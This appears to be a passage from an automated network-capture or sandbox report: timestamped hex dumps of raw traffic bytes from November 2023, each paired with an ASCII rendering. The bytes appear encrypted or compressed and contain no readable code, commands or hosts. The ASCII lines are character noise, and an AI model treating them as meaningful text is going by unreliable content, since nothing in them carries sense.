                                                                                                                                                                                                Data Ascii: \cP,%\u":5C<Sg<e+;<~|,]DE]x$|-nE[}{L_6dM|\*jPmjK!Izv+FNRC2aO&_[Gx`:7|;5M_PZYiiu|vCCxX,0\OHX[
                                                                                                                                                                                                2023-11-17 18:25:36 UTC48INData Raw: 92 35 da 97 f5 5e ab 22 db b0 1e 7e f6 2c 0f d9 83 a9 af bb 9d 9f ab 09 8e f2 7c 08 08 71 96 14 96 ac e7 29 50 4d a3 6d b9 d5 a0 2e 0b 1c ba b6 38 23 b6 0e 2e 2b 04 c1 4e a0 c6 86 6e ae 42 ab 3c 6c 2d f8 94 d7 3e d8 4a fb 72 03 ba a3 ed a5 3c 79 6d f7 9a e4 3a be 35 e4 4c 16 b3 20 3f fe 87 d6 8e 81 6f 8d 9a c5 06 ea 78 d3 e8 0e 51 46 95 7c c3 38 15 f9 4e 84 7a b4 04 69 9f 30 c7 19 65 3e ab ce 12 1f c0 d0 c0 e5 73 57 5c 08 eb 02 ff 86 2a fb 1e f2 c0 c1 62 e7 70 43 c4 27 68 eb c5 c2 c4 04 60 6a e0 a8 dc dd 88 b3 57 ca 28 99 c9 97 b4 53 e4 6d 90 2f d0 c3 90 93 69 ae 7c 42 ba aa fd 3e 22 6b a8 bb e0 73 2d 4b 99 8f 3f 69 52 7e e3 b7 8d da 43 69 bf 8d 60 2b e2 c4 ae 5a 9b c4 44 68 02 78 83 4f 24 70 37 c5 0e 5f c7 72 59 6a d8 aa 2f ec af 6c 8b c4 69 d9 17 3d 65
                                                                                                                                                                                                Data Ascii: 5^"~,|q)PMm.8#.+NnB<l->Jr<ym:5L ?oxQF|8Nzi0e>sW\*bpC'h`jW(Sm/i|B>"ks-K?iR~Ci`+ZDhxO$p7_rYj/li=e
                                                                                                                                                                                                2023-11-17 18:25:36 UTC49INData Raw: a0 9d 65 2d e6 22 c4 ed 3a 7c 3c 53 c6 f4 76 f6 cf 82 4f ca db 5b 72 e0 c4 d8 9a da cc ea e2 ac ce 40 28 cc 4e 45 13 4a 71 58 aa ac be 69 b1 eb 2a fe ac 93 7d bb d2 bb a5 0b 9a c4 67 e2 6d a5 10 67 8a 64 9c 07 3a 76 ac 4d 16 e1 7b 46 65 2d 18 0b 17 e9 92 53 1e 6c 5a a3 d2 82 7b c8 75 7c ed 47 4b be 2c 03 b3 ef e2 70 2e f6
                                                                                                                                                                                                Data Ascii: e-":|<SvO[r@(NEJqXi*}gmgd:vM{Fe-SlZ{u|GK,p.
                                                                                                                                                                                                2023-11-17 18:25:36 UTC50INData Raw: 7b 5b 4a d2 1c 52 57 25 40 3b e1 09 d3 58 d9 96 4d 6d a9 92 ae 07 f3 bf 3d a0 0e 5a 3d aa 6d 27 65 44 de e4 39 7e c2 6a a9 c6 e7 bb c2 32 19 eb 8a 2a 0c 0d 96 fd 42 c3 7b e2 d4 44 1f 52 c2 09 6e 3f c3 8e fa ab a9 73 22 52 6a f0 50 ad db d1 64 3e 72 64 22 65 36 06 7b f0 cc 3c cc a3 59 15 74 9d 80 4b 9b d7 99 7c 7f ec 0b 16 bd 82 37 41 2a af 6f 12 d3 de 0b 22 d6 c9 08 e5 4f e0 82 c5 48 4f 70 13 e1 ab 80 dd d8 87 40 2c 54 61 1e 45 35 ae 39 6c ee c5 f1 75 14 e4 4f 57 d2 39 ae ba 41 ed 0b ed f6 48 b1 94 18 28 58 e4 a4 57 b0 52 eb 32 2a 71 75 e9 d6 49 6c 7f ae 99 36 1d 74 8e 77 92 a0 45 fc 67 28 e2 6b 6e 3b 3c cd 4c eb 6c ee 5c ca e2 6f af b9 95 71 69 63 95 f1 48 64 2b 5b 6f 43 49 cf 8d 53 2c f9 59 04 ac 49 8b af 21 73 23 b2 95 7a bd 7b 7f 12 63 57 fc 89 c1 4b
                                                                                                                                                                                                Data Ascii: {[JRW%@;XMm=Z=m'eD9~j2*B{DRn?s"RjPd>rd"e6{<YtK|7A*o"OHOp@,TaE59luOW9AH(XWR2*quIl6twEg(kn;<Ll\oqicHd+[oCIS,YI!s#z{cWK
                                                                                                                                                                                                2023-11-17 18:25:36 UTC51INData Raw: 86 86 7d 39 26 36 f0 4d 37 b1 6b f4 40 8d 5e ba ed 6d 41 18 78 b5 3d 98 ec 07 e3 aa c1 cf 1a 98 b5 be 47 29 05 7a f8 ab 81 6f 54 9f 55 8c d8 bb 20 0a 0b 8d e0 f2 30 a1 2a e4 9e 5f 35 c6 9b 79 22 58 4a 80 66 68 fa 05 99 fe f0 d4 1d ca 51 62 ab e1 54 75 15 e1 a6 17 81 4c 86 82 b4 47 49 ba 63 af 9b 32 23 25 a9 21 35 76 4e 03 3b 3b c3 74 a5 71 40 3f b2 79 16 a0 0a b6 89 a4 aa f7 b1 a8 1c b6 57 f4 31 e7 cd d3 2c 9a e8 5f 96 db b0 0c 27 c0 d0 5a 99 6e 6e 1c fd 69 e3 ec 43 85 74 2b ab 7d 9f d2 12 b1 7e 2e 65 7d 3f 2e 28 5c 5e 93 4a 29 8d 2d 7b dd 14 87 2b 47 dd 82 7c 67 b9 87 cf 2a 97 d8 d1 77 1f e1 94 22 d0 d7 19 54 f5 aa b4 95 eb b9 be 2d 44 e3 47 64 92 87 4c f6 bb 99 ae 2a 06 38 09 bd af 7a e1 11 1e a6 5d 2e d8 8c 36 e4 c3 ba 5a c6 4b cf 82 ec 18 3c 53 cc f6
                                                                                                                                                                                                Data Ascii: }9&6M7k@^mAx=G)zoTU 0*_5y"XJfhQbTuLGIc2#%!5vN;;tq@?yW1,_'ZnniCt+}~.e}?.(\^J)-{+G|g*w"T-DGdL*8z].6ZK<S
                                                                                                                                                                                                2023-11-17 18:25:36 UTC52INData Raw: 13 0d 5f 34 d5 85 57 fb fc 95 dc 18 24 64 8a c6 10 2d a6 97 88 fc 59 78 8b ba 61 d6 7b 91 52 56 6d 05 d4 c7 f1 21 58 07 06 41 71 3e cd 47 df cc 66 ef ae c3 b5 8b b4 66 70 ce 9d a5 ff 8f 65 b6 62 1c 7e 94 62 15 53 3d cd 43 8c bf f8 73 b1 da 65 d5 fb 54 b8 44 3b 38 9a ad 00 7b 56 09 e0 d6 1e c4 fb f5 20 af cf 52 71 90 e3 94 6c d1 26 e0 17 7c 32 e0 b1 d7 fb 8d e1 68 07 79 ba 7d 8a c0 8a 47 f7 ac a0 bd 46 cd 63 35 7a 5f af bd 58 9f 13 67 f3 fe 86 a4 dd 41 98 16 4a e0 3b 48 df 28 32 a8 ff e0 39 d9 2c f0 ff d0 94 30 77 1b 1f 7b 97 24 25 95 02 e5 dd dd 2c 7c 80 70 ba c1 aa a2 f4 70 47 4a 32 5a cd b3 a7 3f 75 30 d9 67 89 fe 6e 49 b5 4d 43 14 dd 0a 97 2e 54 74 3c d6 9c 0f 0e f0 ca ba 8e 18 5d 3d 90 c4 19 f0 6d 6a 0d 71 5a a7 11 44 60 3e 7c db 15 f6 a1 9e 1c 60 71
                                                                                                                                                                                                Data Ascii: _4W$d-Yxa{RVm!XAq>Gffpeb~bS=CseTD;8{V Rql&|2hy}GFc5z_XgAJ;H(29,0w{$%,|ppGJ2Z?u0gnIMC.Tt<]=mjqZD`>|`q
                                                                                                                                                                                                2023-11-17 18:25:36 UTC53INData Raw: d0 a9 a5 10 c9 18 ac 08 06 c3 f6 9d 84 f0 13 c1 24 30 aa 77 d9 7d 53 1f a1 30 ce 64 3d 7f c3 f5 db 5d 99 71 f8 50 ee 1a 78 f9 cc d9 ae 78 ea cf 0d 7c 51 23 c2 2e fe a2 42 ef 6a fb 7a a6 53 aa 3f da 61 c9 60 7f 51 2e fd cc c2 f9 44 86 4e e1 08 37 69 d1 dd 97 9b 08 89 c9 7d 96 68 32 fb 57 10 3d 90 09 3f ef 51 c0 26 18 f8 15 ee d3 87 c4 dc a2 c7 cd 05 47 74 ec 06 41 8f 9c a9 db 30 d3 2b 43 5f 01 a5 b0 62 e0 62 18 72 2a 25 7d 00 88 cf 78 59 a0 7b 02 16 d0 5d 6f 49 c4 87 07 14 7f 0c 4e b6 f5 04 7f ac 16 45 40 43 8f fb 3f b9 80 ac a1 f6 f5 ad 64 5c 1e a1 13 fb 7b c5 52 fc 3a fd b8 1f 83 9a 3d 33 a7 8f 75 34 39 84 3e cf 10 37 ea 25 8e a5 9d e2 73 f8 5b ac 44 f4 22 38 2a 84 76 17 e5 6c 34 a6 3a e8 38 56 87 e8 b5 f3 b9 60 59 1a 0c b9 2a ca dc dd b8 df dd c3 b8 13
                                                                                                                                                                                                Data Ascii: $0w}S0d=]qPxx|Q#.BjzS?a`Q.DN7i}h2W=?Q&GtA0+C_bbr*%}xY{]oINE@C?d\{R:=3u49>7%s[D"8*vl4:8V`Y*
                                                                                                                                                                                                2023-11-17 18:25:36 UTC54INData Raw: 70 e1 b1 64 6f 80 58 cb 60 93 3b 54 d3 e6 45 4a e1 de 08 ae 28 a9 e2 51 38 60 a8 eb 89 ed 05 66 d0 95 00 ce ed e1 c6 55 d4 7c 0b 71 b1 de 9a f2 bb f8 93 98 01 68 1a 88 9a 0d c6 38 b2 c9 e0 36 cd 24 a9 9c 5a d7 94 4a 76 f1 91 78 79 47 b8 81 36 24 f5 8a f8 75 ec 7e c4 55 9a c0 1d b2 b2 d2 94 fa cc a9 4c 14 a3 dc c3 41 dc 44 0f ec db 78 ac 25 4d e9 5f 6f aa 61 e2 91 c8 f2 11 4b 14 8e 79 5f 8a 52 07 a3 9a 23 6a b3 82 27 62 1e 18 1f 61 c0 9a 2f 49 7b 2c a7 ca 35 c0 3b 9d 7c 76 4b 9b 4f a9 ad 98 d8 e2 35 7e 1d e0 bb d6 75 5d 98 5a be fb 6c d2 eb fb fa 99 9c 76 95 30 8f 9b 4e 66 43 17 00 ab 14 a3 78 78 15 96 ee 12 fe 3f 7b a7 58 77 6a f3 c2 f9 e4 5b 41 f4 91 fd f0 4c 45 dd e9 7c fb 8c 77 d8 8c 15 78 63 15 08 51 dd b7 0b 4b e7 99 b2 68 91 96 ed e7 46 49 25 a4 f4
                                                                                                                                                                                                Data Ascii: pdoX`;TEJ(Q8`fU|qh86$ZJvxyG6$u~ULADx%M_oaKy_R#j'ba/I{,5;|vKO5~u]Zlv0NfCxx?{Xwj[ALE|wxcQKhFI%
                                                                                                                                                                                                2023-11-17 18:25:36 UTC56INData Raw: f6 5e b0 31 f0 c0 68 24 6c 2e 85 4b 89 82 77 00 25 61 24 54 c9 6d 60 18 3b 5e 29 4f d7 25 e8 8c c1 f3 f1 90 22 b3 57 97 a6 c6 58 09 5d 2f 4e fa 25 de 56 83 dd 37 c7 7e 3c ab 0e 2c 9a ff 95 92 b7 88 cf 73 e8 6a 9c c8 20 f8 4e 43 3f 6b ed ed 4a e6 be 9e e6 ae 81 8e e2 76 54 5f 85 cc a9 3b d3 64 4a 59 7a 87 ca 14 00 01 d2 d1 d9 53 68 01 71 81 a0 8a ff 68 00 8b 94 cf 64 61 94 d6 ea 45 f1 9c 37 17 b0 b7 fb 08 17 c5 dd f0 1b 3c a8 77 2c 25 1f ce 80 0e 41 43 d4 77 43 74 40 1d a1 d4 ad 58 75 a2 36 b7 25 5a 57 b0 2c 65 c7 ca 37 89 83 ff 0e 91 2a 3a 3d 3d 06 f8 09 a8 f6 ee 14 92 d6 18 ed 6e 1a 22 8f fd 17 05 67 84 0f b0 18 15 69 c0 2a 47 8b 75 62 1d 8a b3 19 70 b0 7e d3 6f 00 08 0e 4c d8 fd 10 44 6c db 74 b8 10 ec a4 c9 ad b6 ca f4 77 d3 de 5e 0e b6 02 e4 4a 4e 0b
                                                                                                                                                                                                Data Ascii: ^1h$l.Kw%a$Tm`;^)O%"WX]/N%V7~<,sj NC?kJvT_;dJYzShqhdaE7<w,%ACwCt@Xu6%ZW,e7*:==n"gi*Gubp~oLDltw^JN
                                                                                                                                                                                                2023-11-17 18:25:36 UTC57INData Raw: 53 a3 cf ad 63 74 a3 e3 a6 37 31 c3 6d 93 47 79 75 ab 20 c5 30 85 50 5e cb f6 69 9c 90 21 84 12 da 07 91 a8 f9 62 43 94 b6 4e e7 c5 41 d0 6e b6 ed a5 25 24 26 8c c7 98 92 00 c0 99 d9 b3 00 48 3d a8 2e 5c 2e 38 c8 af f1 c5 8d 05 2e 7c 0f 80 51 b0 ec cc a0 b5 a1 3f e8 2b 4d a4 45 c1 a2 f9 ff 94 83 c9 27 87 54 6a ba cd 91 58 c8 1c fc 43 fe d2 3e f2 65 fa 20 98 9f 9d 48 16 87 fb 93 8a 33 b2 7a 42 94 26 ee 0c 13 61 53 f4 36 01 e4 1b 87 73 59 7e 43 b6 19 61 a4 66 5d fe 1c 20 d2 c3 5e 5d 72 8b a4 b0 08 75 40 e9 2a 77 2d 01 e7 5a da 2e 57 bd ce 4a 32 94 5c 3e dd 10 d9 4f 77 3b 6a bc 33 de 52 71 9e be e3 b7 91 f8 b3 e2 67 86 05 ef b3 59 60 b7 d2 10 06 1c 96 b6 65 ea 56 9d d4 3b f9 15 6f 81 c5 7f 3c d2 79 5d be 0f a9 f0 cc f3 64 a2 5a 99 6f c2 11 96 b7 5f 60 0a c9
                                                                                                                                                                                                Data Ascii: Sct71mGyu 0P^i!bCNAn%$&H=.\.8.|Q?+ME'TjXC>e H3zB&aS6sY~Caf] ^]ru@*w-Z.WJ2\>Ow;j3RqgY`eV;o<y]dZo_`
                                                                                                                                                                                                2023-11-17 18:25:36 UTC58INData Raw: 33 8a 5d 57 72 ce ff 9a 7a a7 ae f0 9b 8e 66 50 ee 2f 82 ed d8 d9 5d 83 94 64 a8 6c 79 7e 26 94 81 1e 86 30 aa b4 f1 70 e6 b2 e1 11 87 15 e8 6e 1c 57 08 32 b8 7c 07 22 95 21 8a 18 5c b8 19 98 59 ea 3e 1c 68 c9 46 17 23 58 72 94 7c b2 d0 74 15 09 96 76 72 4f 74 60 99 f1 08 e5 e9 e0 07 d5 4e ad ed 74 b8 ad 29 ca a7 27 de 5c 59 f2 94 aa 31 da 3f e6 6d ad 18 c4 bd 94 9c 09 62 61 5e fb a7 61 d7 38 31 4d bd dd ff fc 01 75 9d 4c 62 72 a4 59 d4 e0 ae 92 81 81 45 1b 40 24 0c fd 11 8f 45 fa 8f 5d 3e a0 45 4a 68 fa b9 95 f2 07 86 a3 39 7c c6 62 23 29 2d f0 bc 9e eb 2e 30 8a 98 d3 d5 c0 19 21 69 84 70 54 e5 19 e6 8a 3b 79 1c e8 5b 26 12 07 49 e0 f5 26 6f be 42 e4 a8 da 69 73 8a 49 26 44 03 4d 10 b6 f6 12 21 ef d2 14 99 42 bb bb 65 e4 66 5d 4f 62 1d 7b 99 4e a8 a3 b6
                                                                                                                                                                                                Data Ascii: 3]WrzfP/]dly~&0pnW2|"!\Y>hF#Xr|tvrOt`Nt)'\Y1?mba^a81MuLbrYE@$E]>EJh9|b#)-.0!ipT;y[&I&oBisI&DM!Bef]Ob{N
                                                                                                                                                                                                2023-11-17 18:25:36 UTC59INData Raw: 70 96 72 94 d9 0f 7b 8d 0e f8 63 00 35 3d ec 92 9b 73 54 47 43 b1 34 01 c0 23 c5 a7 ca 7f ca 81 b9 0d 02 97 a5 5a ed d2 b2 01 bd 00 1f 5f 69 f3 3e 5e db 79 2b e9 30 8b 1a 52 22 63 ff bd 88 47 15 f1 93 3c 2a 17 a6 76 49 63 79 98 d7 00 b7 46 34 29 37 51 eb 7e b8 a0 18 e8 4e c6 36 0d 26 25 d8 5b 32 7e 5b ad d3 76 33 a1 b3 d3 14 8d c2 a5 a3 8f 31 02 dd 58 1e ad eb 13 28 76 ec c5 bb ae 65 89 71 df 58 d7 69 0f 89 73 99 0a a9 80 e1 e0 73 b0 7f d5 f1 be 53 c9 50 7a 45 33 19 b5 23 e7 42 f7 47 78 36 a5 b9 0d aa d7 5e 1b f6 2c a9 c2 d5 46 93 9b 75 fb 73 5e 7a 1e 9f 89 94 6f 18 23 47 10 65 4d aa f3 03 4f 33 16 b3 93 70 ac 63 85 d7 dc 14 d6 60 f7 51 a1 ec f0 b4 f9 1e c6 de 7d c9 49 d0 60 aa e4 c5 a1 02 55 82 dd 16 e5 3b b4 b2 aa 69 b4 95 eb 89 68 f9 47 8e f5 12 51 11
                                                                                                                                                                                                Data Ascii: pr{c5=sTGC4#Z_i>^y+0R"cG<*vIcyF4)7Q~N6&%[2~[v31X(veqXissSPzE3#BGx6^,Fus^zo#GeMO3pc`Q}I`U;ihGQ
                                                                                                                                                                                                2023-11-17 18:25:36 UTC61INData Raw: 93 a7 d3 68 41 32 5e 2f db 1e 0c da a6 d4 36 3e de 2a 0f 38 9a 8e dc 70 8b ba de 82 24 3d 12 25 4e 41 0f f8 7f c9 3c 38 43 6c 85 cb ef 78 37 46 e8 a2 d0 29 02 a4 0f 85 13 cc 21 ee 84 2e 4c cb 85 6c 7b 2d 2d 43 70 79 3b c5 c1 07 bf 23 1f 40 12 d8 2f f2 32 4c 48 04 a3 bc f3 be 45 2d d0 f0 3c 6c f0 74 19 dd 6b a3 77 9a 39 c2 87 21 fa 69 eb 0b 69 be 2f e0 a3 ee b7 c7 1c 36 80 9b a0 67 f7 20 af b0 87 24 01 58 34 91 68 7c f0 96 06 85 8a 27 fb 3a 69 bf cd 73 ef ac 77 b3 7a 1c 0e f4 16 dd 16 a1 47 11 01 23 dd bb ea bf 02 30 bf 05 ba 84 66 e5 18 91 18 73 ba be 9c cc 00 ad df 48 be be 49 c8 ab 97 0a aa 73 67 32 4b 29 13 b2 fa 6a a1 1d 95 53 4f e7 04 70 d7 1c 88 ea c4 6f 1a f6 c8 99 7f 81 52 9c 64 88 87 c9 ab 63 c6 07 61 80 c1 87 5d ba ef bf 5b 97 28 b7 54 1c bb c1
                                                                                                                                                                                                Data Ascii: hA2^/6>*8p$=%NA<8Clx7F)!.Ll{--Cpy;#@/2LHE-<ltkw9!ii/6g $X4h|':iswzG#0fsHIsg2K)jSOpoRdca][(T
                                                                                                                                                                                                2023-11-17 18:25:36 UTC62INData Raw: 99 13 c9 1c 6d d6 60 99 ab a6 2f 2b 75 76 e3 7b 59 5f 74 f3 1d 86 dc e1 6e 26 06 ad ab 21 e3 a1 9b cd a5 b8 fb 31 d6 a2 cc 6a c0 10 8e e1 52 dc e3 b7 c8 a3 c3 45 d1 9c 19 f5 90 33 97 30 14 f7 d1 49 04 8b 10 f4 4a 49 1c 4a e7 36 8d 97 2d 25 0e b5 37 e6 62 70 c7 00 1f b1 47 ea 16 8a ec ae 85 8e ce f3 fb 26 74 f8 26 b8 a4 48 f3 39 eb b9 34 41 d0 b5 ce 05 23 46 27 b6 8b dd 58 ae 76 ce fc 6a 0e f1 f8 60 e9 bf ce 47 e8 ff 41 8c d6 aa c6 5c b2 6a 47 58 e9 44 57 bb 32 b3 2a f4 4a 59 13 13 d6 47 63 32 af 03 53 cb 57 08 b8 1e 21 72 25 88 bc 48 7d 21 ee c9 08 4e ae de 6f 01 a4 33 69 92 22 8c 6a d7 7c 13 11 f9 9f 12 64 3f a1 fa 57 42 0e d8 dc 69 a6 be c3 bd 69 34 5c 42 ec 00 38 eb 20 6c 9b 86 cc 1a 60 9c f9 e5 1b b5 f4 63 b3 85 30 74 27 65 36 c0 85 48 45 64 1b 49 05
                                                                                                                                                                                                Data Ascii: m`/+uv{Y_tn&!1jRE30IJIJ6-%7bpG&t&H94A#F'Xvj`GA\jGXDW2*JYGc2SW!r%H}!No3i"j|d?WBii4\B8 l`c0t'e6HEdI
                                                                                                                                                                                                2023-11-17 18:25:36 UTC63INData Raw: 94 3a c6 97 66 f2 5d 18 79 e3 2d 72 23 6d 65 82 bf 4b cf ba ec 7e db ff 49 39 ff c1 ad c3 64 28 b7 0a bf 19 03 26 71 75 26 cd ec 74 99 44 99 eb 37 c0 f9 ed b8 60 c2 99 b6 33 6d d9 a6 c7 7c bb 76 5a 62 bc fb 78 34 6f a9 0b 99 57 27 b0 5d 86 cb 87 de 01 f9 f7 fb 82 a2 d9 7e 9b b1 53 cf 36 3a 10 49 06 53 5e 48 6f 65 7f 43 f0 9f 12 de 7d fd 2f fe 3b 24 ed fe 8e a3 39 1a 40 5f 62 53 69 40 1e 85 cf 59 7d d4 1c 8a aa 59 73 12 5a e7 f9 3f 55 a1 6b 8d 5e ee f0 26 c5 1b b6 df 1a 00 ea f8 05 c2 0e 12 2b f5 f3 25 99 37 74 97 15 16 1d 41 bf 0e 60 12 37 f4 48 99 fd 9e b9 a7 97 69 70 24 5f 1c 3d 26 5e 23 5e dc 44 94 a5 25 f7 98 85 6d 72 51 a0 1c 53 4c 3a f5 4e 69 96 8a a4 8a 02 55 4c 63 43 32 27 21 1b 76 8c f0 7a a4 53 a5 89 2b e0 a3 04 c1 bb 5e 8c 20 75 7f c5 94 db 60
                                                                                                                                                                                                Data Ascii: :f]y-r#meK~I9d(&qu&tD7`3m|vZbx4oW']~S6:IS^HoeC}/;$9@_bSi@Y}YsZ?Uk^&+%7tA`7Hip$_=&^#^D%mrQSL:NiULcC2'!vzS+^ u`
                                                                                                                                                                                                2023-11-17 18:25:36 UTC64INData Raw: b1 30 a8 80 a4 48 e3 78 28 41 a6 6c d0 b2 ee 11 e7 ad ed 1d 45 44 f1 10 c4 b7 aa ea 40 a7 c3 86 27 33 82 48 c6 52 4c cb a8 98 af 02 5a 12 e2 14 14 9d 4d 7f e2 73 05 1d 5f 51 55 76 b0 5a 07 e0 3c 97 13 83 9c 13 21 c3 28 08 85 b2 f3 50 41 a6 5f a0 08 40 c9 0e 87 3b d8 f6 1d 70 9d f5 b4 dc 7a e5 10 6e cb 62 c3 d5 bb cf e7 47 e2 37 09 42 2d 98 91 be 53 53 19 47 79 3a ed 79 e3 99 92 ec 25 0f 44 8f 4f 6e dc 55 0d 2f 0f d3 82 c6 5e d1 54 8b ab d7 8c 11 2e 5b 9c 49 77 11 27 a2 dd a8 2f 4c a7 17 e1 ea f4 1f 58 97 92 36 87 ec 7f 24 27 e7 68 4a 96 5e 91 e7 b6 a8 0b 27 2a 64 b3 f9 fc 89 5b 7f 3f d3 70 71 04 c4 76 04 5c f4 cc 06 b8 3d ed 88 d4 81 a4 cb 8e 35 c8 64 20 c0 f1 22 cb 36 be 73 b2 46 68 89 e1 05 ff 75 f1 3f 03 a7 51 bf b1 a8 da f4 7f 28 5d 3c 48 ea 0a 4e d0
                                                                                                                                                                                                Data Ascii: 0Hx(AlED@'3HRLZMs_QUvZ<!(PA_@;pznbG7B-SSGy:y%DOnU/^T.[Iw'/LX6$'hJ^'*d[?pqv\=5d "6sFhu?Q(]<HN
                                                                                                                                                                                                2023-11-17 18:25:36 UTC65INData Raw: af ef 8d 05 3d da 64 4f a9 d8 7d d7 99 88 04 78 ec e3 6e 6b ee f7 30 59 99 fa 8f 40 ba 2f c7 9f eb 78 71 6a 2e 42 7e c5 49 3d 6a d5 8a 2f 87 74 43 be 34 1b 0b 12 15 ff 58 87 a0 4f 62 35 33 15 9b b3 cf 6b 0f 69 d5 7b 40 f6 01 7f f8 75 28 c3 62 d6 f1 ac 19 5b ba 72 eb 06 2a 10 08 e7 d2 14
                                                                                                                                                                                                Data Ascii: =dO}xnk0Y@/xqj.B~I=j/tC4XOb53ki{@u(b[r*
                                                                                                                                                                                                2023-11-17 18:25:36 UTC66INData Raw: 06 58 ab fd 7d b7 f9 0a 1d 21 08 29 a1 0e de f6 e8 a9 cb 09 24 48 ac e2 ec a2 65 cf 00 fd 51 62 06 72 65 a3 41 9c ca 10 b8 d3 9d ae ee 99 87 6f d7 3f 74 36 a9 33 4f e3 27 42 ee f0 da 35 63 58 a5 c5 a0 46 8b e2 a7 08 ca fe 46 c9 24 0e 84 da 1d 7b 4a 17 bf 09 c6 19 00 a7 cb 49 16 a0 fe 83 f0 7c 6a ca 9d 65 ee 87 8f 32 9a c8 25 2a 44 19 78 ff bf 22 56 1e 9a be b2 2c 0c 70 bc 6d b9 a8 6c c1 d8 6e 12 d4 77 38 3f 5f 79 c2 53 b2 6d 4a fd fb c1 bc 6f 30 30 3b f5 80 e4 be 56 c7 d4 cb db b6 bb 97 ee fd 78 ff 2e 7d 71 04 d6 a7 67 ec 41 b0 bb 7e 00 5d eb 8c 00 cb 10 a9 e4 be 5e ee 42 da 8e 72 2d 43 bc d0 f0 c8 b6 46 08 de 8d 0e 74 37 b1 4b 3e d9 1f 70 c5 9f 65 36 d2 a9 b3 e2 f8 df d8 f6 06 30 5a c2 ad 37 fb 74 1c a6 78 e3 d8 e7 0a 16 00 b0 73 f6 b4 ee 42 5e 44 dd fa
                                                                                                                                                                                                Data Ascii: X}!)$HeQbreAo?t63O'B5cXFF${JI|je2%*Dx"V,pmlnw8?_ySmJo00;Vx.}qgA~]^Br-CFt7K>pe60Z7txsB^D
                                                                                                                                                                                                2023-11-17 18:25:36 UTC67INData Raw: 57 bb 14 05 3c 9b 13 69 6a ae b6 41 67 bc 7f 4c 1a 77 50 31 1b d5 07 96 15 a7 7e f1 6a 88 65 20 ba 3a ac de 5f 87 dc df e1 17 e6 b2 8a 30 d7 be 86 d5 80 90 cc a6 e9 4d cf ac fd 1e d1 be 2a 2a 82 25 17 c7 44 46 ac 16 0b 5a be 75 06 bf f6 41 d0 f2 6e aa 65 c3 d9 97 1b 7d 3d 08 1e e9 14 68 28 fb 0e 09 3b 75 be 9c bc 00 c8 ea 92 72 65 90 cb 29 08 7a e4 57 87 16 72 44 c1 60 a0 1a 44 19 d2 e9 b4 65 20 6f 9b c1 92 08 2f f9 65 51 c8 50 6a 40 a6 bb 4b ad e8 44 f6 13 98 96 70 06 a3 fd 23 8a 06 c0 35 37 c3 f2 14 87 16 bc e1 bf 9c da 1d cc dc 97 48 db 26 20 9d a4 45 c8 85 00 4e eb e6 8f 5d d8 46 4b f6 19 c7 8d 08 b1 6c a1 ec 0f 91 33 68 5a c1 25 db ca b2 ac c7 55 0e f4 be fa f4 4f b5 80 6f c1 93 3d 93 e6 00 80 ee 3d 58 47 ac 96 e9 9c 29 d9 6d 78 94 14 10 ef 03 ae 02
                                                                                                                                                                                                Data Ascii: W<ijAgLwP1~je :_0M**%DFZuAne}=h(;ure)zWrD`De o/eQPj@KDp#57H& EN]FKl3hZ%UOo==XG)mx
                                                                                                                                                                                                2023-11-17 18:25:36 UTC68INData Raw: 5c 3a fa d1 b7 21 4c 0b 97 9c 64 42 ed 4f 3d 53 f7 cc e0 96 45 4f a4 94 a9 87 52 dc b2 9b 60 44 da 19 6f 23 bf 20 e7 1d 61 5e 31 02 d8 54 72 5f 84 b5 e2 73 37 1a 12 28 c8 59 42 26 c6 5a 4c 3a 6a 99 b5 0b 84 16 73 c9 2b a7 5c b0 74 12 ce c6 b8 e3 0f 94 15 71 bb 82 63 4b c3 11 d4 9e fd 97 53 e1 34 6f ca bd 6b 3d d2 29 30 7d 22 a3 ae 40 8f b4 6e 96 19 d2 f6 9e 37 82 cc 88 eb a1 1d 7f 2e 80 ab 3d d5 3d f5 e0 68 3b 27 be 94 b5 73 83 19 83 6f 03 90 c1 ff a2 53 58 51 42 43 f1 fc 0d 18 67 8d 61 ad 1d 23 fd 1a d0 56 de 73 5c 33 d8 21 d4 2b ec c6 d3 c2 66 7d 44 47 89 6e 97 b0 bf 33 e7 ac 7d 10 7a 1d c4 4e fc 00 bc b7 23 0b 9f 48 97 de 14 da c8 1e 43 91 ec f5 67 3a de a2 26 01 3b 52 23 db c8 70 fc 2c ce ae 65 d1 ae 84 71 ae fb 37 f9 14 94 fb 7a fb 21 22 fd 41 8b 13
                                                                                                                                                                                                Data Ascii: \:!LdBO=SEOR`Do# a^1Tr_s7(YB&ZL:js+\tqcKS4ok=)0}"@n7.==h;'soSXQBCga#Vs\3!+f}DGn3}zN#HCg:&;R#p,eq7z!"A
                                                                                                                                                                                                2023-11-17 18:25:36 UTC69INData Raw: 29 0c b4 f8 0b 5d 66 69 4e 8f 35 4b 52 1a 76 b0 d9 67 dd c2 43 a0 cb a8 a1 fb 86 8f ab f4 e7 68 a9 26 b7 05 a8 a7 48 13 fb bd f4 ba d7 d8 57 2d ba ef 5a fe e7 48 62 6b f3 b7 a7 a8 01 bd 4d ae f1 86 f5 f8 94 fb ad a8 d2 73 dc fc 13 46 1d a5 12 d5 9e 59 30 65 ec 8d 63 8a 4d 64 4a 05 28 23 a9 db c1 d4 e0 05 cf fd 5e 04 33 3a 56 bc 3c f4 1a 0a ce 2f c7 57 bc 25 49 65 55 56 84 a9 a5 99 6f 9a 29 1c 3f 0e ae ce 7a b1 61 68 26 49 f9 0d d3 e8 0a 3c f1 ad 0e ba 40 e4 b4 42 c5 2a 8c d2 2a 11 25 85 cd 81 c5 86 f5 e4 80 41 b8 8c 64 78 2a fc 66 36 8a 05 9b 74 10 33 89 a3 9a 6e 8b 10 be af 3f be c0 65 9c 4e 03 bf e3 66 39 ea 9d 08 ce 27 ac c7 63 4d fc 36 3e 6c ea 46 f7 2b 85 24 ca 57 f2 b1 cf 15 a9 db 40 88 21 f2 ec 05 c7 33 1b e4 8a 14 8f 02 98 64 f4 83 93 ad f4 fa 68
                                                                                                                                                                                                Data Ascii: )]fiN5KRvgCh&HW-ZHbkMsFY0ecMdJ(#^3:V</W%IeUVo)?zah&I<@B**%Adx*f6t3n?eNf9'cM6>lF+$W@!3dh
